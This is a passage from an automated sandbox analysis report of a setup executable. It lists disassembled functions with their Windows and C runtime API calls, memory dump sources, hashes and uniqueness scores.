                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Close$QueryValue
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2393043351-0
                                                                                                                                                                    • Opcode ID: 6b4f11be13ee901fcecd6ceae9e929827c882c8a10de680e445a5bcd3c86089d
                                                                                                                                                                    • Instruction ID: 928e22d018f57b448c94775f86fcc8d069b78d5810e0e93972759fca1f18ee6b
                                                                                                                                                                    • Opcode Fuzzy Hash: 6b4f11be13ee901fcecd6ceae9e929827c882c8a10de680e445a5bcd3c86089d
                                                                                                                                                                    • Instruction Fuzzy Hash: 7E11F3B9D10229EBCF01DF99CA0589EBBBAEF48755B008066F810A3210D3749A11DBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DA3114 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3_catch_free
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2207867443-0
                                                                                                                                                                    • Opcode ID: d137d0eed0112e1f2b051f270e8d40b75f8115013878fb28d9cc75acd1a973f1
                                                                                                                                                                    • Instruction ID: bda51b8db365471be12bc668c2bc91936050f6822832070af2a44d9aaa1f1615
                                                                                                                                                                    • Opcode Fuzzy Hash: d137d0eed0112e1f2b051f270e8d40b75f8115013878fb28d9cc75acd1a973f1
                                                                                                                                                                    • Instruction Fuzzy Hash: 0C11BE34A04205EFDB00CBA4C6457ACFBB1BF20319F208578D565ABAC1C7758A54DBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DA3B2B Relevance: 3.1, APIs: 2, Instructions: 55COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DA3B32
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69DA4513: __CxxThrowException@8.LIBCMT ref: 69DA45A2
                                                                                                                                                                      • Part of subcall function 69D78168: GetFileSize.KERNEL32(?,?,?,?,?,69DA3B9F,?,?,00000000,?,?,?,?,00000008,69DAEC79,?), ref: 69D78178
                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(00000002,?,00000000,00000000,00000002,?,?,00000000,?,?,?,?,00000008,69DAEC79,?,?), ref: 69DA3BC9
                                                                                                                                                                      • Part of subcall function 69D780F7: WriteFile.KERNEL32(?,?,?,?,00000000,?,69DA60F1), ref: 69D7810D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileH_prolog3$CriticalException@8InitializeSectionSizeThrowWrite
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 593797809-0
                                                                                                                                                                    • Opcode ID: 1e1b29d0ac722451a2a2dca999b693a64b918883bdc8bc56a391f95588422840
                                                                                                                                                                    • Instruction ID: 9ab0c9cde1252f76b85667ee355df3bac1a552cf8945729b2176b3164af9a391
                                                                                                                                                                    • Opcode Fuzzy Hash: 1e1b29d0ac722451a2a2dca999b693a64b918883bdc8bc56a391f95588422840
                                                                                                                                                                    • Instruction Fuzzy Hash: 1E117C7550124AEEDB00DFA4CA45BDEBBB8BF14704F40D421E950ABA81C770AA24CBB2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DB1315 Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DB131C
                                                                                                                                                                      • Part of subcall function 69DB36BA: GetUserDefaultUILanguage.KERNEL32(02602230,?,00000000,?,?,?,?,69DB1338,?,00000010,69D85A14,?,?,?,0000004C,69DBB498), ref: 69DB36D8
                                                                                                                                                                    • _free.LIBCMT ref: 69DB137B
                                                                                                                                                                      • Part of subcall function 69DB374B: __EH_prolog3.LIBCMT ref: 69DB3752
                                                                                                                                                                      • Part of subcall function 69DB374B: PathFileExistsW.SHLWAPI(?,SetupResources.dll,00000000,00000738,00000000,69DAFA6E,0000000C,69DB3A05,?,69D6A794,?), ref: 69DB37B7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$DefaultExistsFileLanguagePathUser_free
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2326855983-0
                                                                                                                                                                    • Opcode ID: 78fe8a606ad9b39b8d87891c5df55f589dcd08039852c3f52b4c0f17ed9c15b0
                                                                                                                                                                    • Instruction ID: 9f9fa4ae89bf0bb08c6965d59a6c446a577ce47a78bbcb2cfe6b7fe67f3154a8
                                                                                                                                                                    • Opcode Fuzzy Hash: 78fe8a606ad9b39b8d87891c5df55f589dcd08039852c3f52b4c0f17ed9c15b0
                                                                                                                                                                    • Instruction Fuzzy Hash: 431127F8C0022ADBCF11DFE48941AAEBB78AF04744F009466D9627BA09D7389542DBF1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698EF35E Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 698EF365
                                                                                                                                                                    • __recalloc.LIBCMT ref: 698EF3A7
                                                                                                                                                                      • Part of subcall function 698F83FD: __CxxThrowException@8.LIBCMT ref: 698F83E2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Exception@8H_prolog3Throw__recalloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2968967773-0
                                                                                                                                                                    • Opcode ID: ae8360946b94439a94e370d5c9469f62969284ee538b32eaf1895f0769d7e139
                                                                                                                                                                    • Instruction ID: 8adb4d1806f7ee3d33303d315630d4b8aba7073a96c9224fb235b2e8fb87a745
                                                                                                                                                                    • Opcode Fuzzy Hash: ae8360946b94439a94e370d5c9469f62969284ee538b32eaf1895f0769d7e139
                                                                                                                                                                    • Instruction Fuzzy Hash: D401963560074187D711CF29D5A171AB3E6FFB2748F608D1CD5A59B544EB72E803DB40
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DA9067 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DA906E
                                                                                                                                                                    • __recalloc.LIBCMT ref: 69DA90B0
                                                                                                                                                                      • Part of subcall function 69DC8E8C: __CxxThrowException@8.LIBCMT ref: 69DC8EA0
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Exception@8H_prolog3Throw__recalloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2968967773-0
                                                                                                                                                                    • Opcode ID: 9418b3ccf933ecd90ee0a96d6f0092a73aa60e372d68b68971f532729ca93823
                                                                                                                                                                    • Instruction ID: e02cb8eb65c40b8ef83f106b12acf2750911c97bb74da5e8b0a1e6d530ba1ff7
                                                                                                                                                                    • Opcode Fuzzy Hash: 9418b3ccf933ecd90ee0a96d6f0092a73aa60e372d68b68971f532729ca93823
                                                                                                                                                                    • Instruction Fuzzy Hash: 3A01AD31640601CAD720CF38C68071A73EAEF817C8B61883CC5A59BE40EB73E822C799
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DC8BDC Relevance: 3.1, APIs: 2, Instructions: 51COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memmove_s
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 800865076-0
                                                                                                                                                                    • Opcode ID: 052af3e1cd63b7b32d93e05f0403934d3c10a9d179138d7e1437bd8bf0c64c07
                                                                                                                                                                    • Instruction ID: b1e0e07221fdae52e6518edc31973a95dc851b53d9d7ca7f7a6a46535d7e25f5
                                                                                                                                                                    • Opcode Fuzzy Hash: 052af3e1cd63b7b32d93e05f0403934d3c10a9d179138d7e1437bd8bf0c64c07
                                                                                                                                                                    • Instruction Fuzzy Hash: A601BCB5600004EF8B08CF58CDA9D6EB3AEEF94348710413DE5458B640EF71AD00C6A6
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DB3ACC Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DB3AD3
                                                                                                                                                                    • _memcpy_s.LIBCMT ref: 69DB3B17
                                                                                                                                                                      • Part of subcall function 69DC8AFC: _wcsnlen.LIBCMT ref: 69DC8B0C
                                                                                                                                                                      • Part of subcall function 69DAFF21: _wcsnlen.LIBCMT ref: 69DAFF54
                                                                                                                                                                      • Part of subcall function 69DAFF21: _memcpy_s.LIBCMT ref: 69DAFF8A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memcpy_s_wcsnlen$H_prolog3
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 301610209-0
                                                                                                                                                                    • Opcode ID: ce4fe6c0659fec62a16cfec2fd8f570cac391580253cf4a7cf4b85bdf95e7cce
                                                                                                                                                                    • Instruction ID: 13b2adaee34dde30eeacf30d2b9965e50517fa6bcb8e4b99e483a87e903cb579
                                                                                                                                                                    • Opcode Fuzzy Hash: ce4fe6c0659fec62a16cfec2fd8f570cac391580253cf4a7cf4b85bdf95e7cce
                                                                                                                                                                    • Instruction Fuzzy Hash: C601287A50020AEFCB00DF68D881E9E736AFF04304B44D975F9119B651DB34EA29CBB2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698EDFAB Relevance: 3.0, APIs: 2, Instructions: 38COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetLastError.KERNEL32(0000000E,00000000), ref: 698EDFD6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1452528299-0
                                                                                                                                                                    • Opcode ID: 992152975c6b579828c46cb307323bab8412d3fedff707f412070478371e49ff
                                                                                                                                                                    • Instruction ID: 3295846ed13a3ef7ec5a0086725e2c177db38ced88f2ede9dbb65bd90b6e5070
                                                                                                                                                                    • Opcode Fuzzy Hash: 992152975c6b579828c46cb307323bab8412d3fedff707f412070478371e49ff
                                                                                                                                                                    • Instruction Fuzzy Hash: 7DF0BE323482046FE610A669DC4AF567798AB8BBA4F408D2AFA04EB181CA61AC048390
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DC847A Relevance: 3.0, APIs: 2, Instructions: 38registryCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegOpenKeyExW.KERNEL32(00000000,00000034,00000000,00000001,00000000,00000000,00000034,?,?,69D8463B,00000034,00000034,00000000), ref: 69DC84A9
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,69D8463B,00000034,00000034,00000000), ref: 69DC84BA
                                                                                                                                                                      • Part of subcall function 69DC8414: GetModuleHandleW.KERNEL32(Advapi32.dll,?,?,69DC849F,00000000,00000034,00000001,00000000,00000000,00000034,?,?,69D8463B,00000034,00000034,00000000), ref: 69DC8425
                                                                                                                                                                      • Part of subcall function 69DC8414: GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 69DC8435
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressCloseHandleModuleOpenProc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 823179699-0
                                                                                                                                                                    • Opcode ID: 251d1a86fbf0b6dc7908f4eaf191f09fe6875f9cdd27809b2c16f945557bdf0f
                                                                                                                                                                    • Instruction ID: 6ffe59da20d491066483be64968e7c4bdd36298db325b37bc7516117aab2ea2e
                                                                                                                                                                    • Opcode Fuzzy Hash: 251d1a86fbf0b6dc7908f4eaf191f09fe6875f9cdd27809b2c16f945557bdf0f
                                                                                                                                                                    • Instruction Fuzzy Hash: F9F0497610920AFBEB058F44CD41F9ABB6EFF00366F208029E915AB540D731DA208BA0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DAB17C Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __recalloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 492097735-0
                                                                                                                                                                    • Opcode ID: 3c675ecc4d7f7adcfd4d8a0b3a4f198d11c50a5156c324ca8cfe79ed0944204a
                                                                                                                                                                    • Instruction ID: dbf428c2f7e404aadca3e2154a3d7615590c120d3f74b790dfe05729d4f90948
                                                                                                                                                                    • Opcode Fuzzy Hash: 3c675ecc4d7f7adcfd4d8a0b3a4f198d11c50a5156c324ca8cfe79ed0944204a
                                                                                                                                                                    • Instruction Fuzzy Hash: 73F03AB5640204AFEF008F64CC81A62BBA8EB19254B04D070EE19CE68AE635C822C7A1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DAFFA8 Relevance: 3.0, APIs: 2, Instructions: 35COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memcpy_s
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2001391462-0
                                                                                                                                                                    • Opcode ID: fe5dc39283643cf855e32fa90a050dbc95af31c6f7c3c4c905a391bb1e7ae606
                                                                                                                                                                    • Instruction ID: 54d065e510e43a816a5b1ee9c83fcc361ade66041b82e214615cbf5f14b7439a
                                                                                                                                                                    • Opcode Fuzzy Hash: fe5dc39283643cf855e32fa90a050dbc95af31c6f7c3c4c905a391bb1e7ae606
                                                                                                                                                                    • Instruction Fuzzy Hash: 0CF03A76800158BB8F10CF96CC44DCF7F6DEE85254B148066FD04A7200E670EA41CBB1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698E11BA Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 698E11D8
                                                                                                                                                                    • FlushFileBuffers.KERNEL32(?), ref: 698E11EA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$BuffersFlushWrite
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1012034594-0
                                                                                                                                                                    • Opcode ID: ce6644fb6fca041a435bcd57b03d903cb014eefed3e65614f2a5ced19651351a
                                                                                                                                                                    • Instruction ID: 4e3232573000cce78f9bea156822c4ec90ae8e81b9e4d270e14a89e47f5dc5bb
                                                                                                                                                                    • Opcode Fuzzy Hash: ce6644fb6fca041a435bcd57b03d903cb014eefed3e65614f2a5ced19651351a
                                                                                                                                                                    • Instruction Fuzzy Hash: 1EE09236118246ABEB01AFA5DD05F9B3BE9EF16750B049829F914C1110E730E8208B90
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698F6041 Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 698F6048
                                                                                                                                                                    • GetCommandLineW.KERNEL32(0000001C,698E30C2,?), ref: 698F604D
                                                                                                                                                                      • Part of subcall function 698DBE03: __EH_prolog3.LIBCMT ref: 698DBE0A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$CommandLine
                                                                                                                                                                    • String ID:
